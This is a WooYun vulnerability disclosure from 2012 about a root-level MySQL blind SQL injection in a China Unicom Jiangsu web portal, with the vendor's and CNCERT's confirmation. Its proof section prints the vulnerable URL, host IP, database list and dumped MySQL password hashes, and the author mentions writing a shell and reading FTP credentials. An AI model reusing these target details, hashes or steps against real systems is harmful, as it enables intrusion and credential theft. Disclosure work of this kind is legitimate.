当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013968

漏洞标题:联通沃江苏门户root盲注

相关厂商:中国联通

漏洞作者: if、so

提交时间:2012-10-28 09:32

修复时间:2012-12-12 09:33

公开时间:2012-12-12 09:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-28: 细节已通知厂商并且等待厂商处理中
2012-11-01: 厂商已经确认,细节仅向厂商公开
2012-11-11: 细节向核心白帽子及相关领域专家公开
2012-11-21: 细节向普通白帽子公开
2012-12-01: 细节向实习白帽子公开
2012-12-12: 细节向公众公开

简要描述:

联通沃江苏门户存在mysql root盲注,而且还支持外连。。。

详细说明:

不多说,

Target: 	http://www.js165.com/nc.aspx?Axon_key=ebca009a6f71a0d5eeee46fa7bd8eced&JumpUrl=0&id=2562388
Host IP: 122.192.35.74
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL >=5
Resp. Time(avg):459 ms
Current User: root@localhost
Sql Version: 5.5.21
Current DB: iportal_res
System User: root@localhost
Host Name: axon-86
Installation dir: E:/Program Files/MySQL/MySQL Server 5.5/
DB User & Pass: root:*EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27:localhost::localhost
root:*EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27:%::%
probe:*907F54ECF133ED21131550572B2D27128CB49888:%
probe:*907F54ECF133ED21131550572B2D27128CB49888:localhost
probe1:*907F54ECF133ED21131550572B2D27128CB49888:%
Data Bases: information_schema
icard
igame
inav
inav1_js
inav_js
iportal
iportal2
iportal_res
iportalv2
ishwapv3
isoft
ivac
ivod
iweather
js_shopping
mysql
performance_schema
test

漏洞证明:

Target: 	http://www.js165.com/nc.aspx?Axon_key=ebca009a6f71a0d5eeee46fa7bd8eced&JumpUrl=0&id=2562388
Host IP: 122.192.35.74
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL >=5
Resp. Time(avg):459 ms
Current User: root@localhost
Sql Version: 5.5.21
Current DB: iportal_res
System User: root@localhost
Host Name: axon-86
Installation dir: E:/Program Files/MySQL/MySQL Server 5.5/
DB User & Pass: root:*EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27:localhost::localhost
root:*EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27:%::%
probe:*907F54ECF133ED21131550572B2D27128CB49888:%
probe:*907F54ECF133ED21131550572B2D27128CB49888:localhost
probe1:*907F54ECF133ED21131550572B2D27128CB49888:%
Data Bases: information_schema
icard
igame
inav
inav1_js
inav_js
iportal
iportal2
iportal_res
iportalv2
ishwapv3
isoft
ivac
ivod
iweather
js_shopping
mysql
performance_schema
test

,支持外连,喷了

,里面好多库。。

好多数据,由于服务器上网站众多,写shell比较蛋疼,目录难找,于是乎发现了这个,

,运气好可以读到网站目录的ftp账号密码,甚至C盘。。(os is win 2003)到此为止吧~。

修复方案:

修改代码

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2012-11-01 23:23

厂商回复:

CNVD确认并复现所述情况(含提权),已转由CNCERT江苏分中心协调当地基础电信运营企业进行处置。
按完全影响机密性,部分影响完整性可用性进行评分,rank=8.97*1.1*1.3=12.827

最新状态:

暂无


漏洞评价:

评论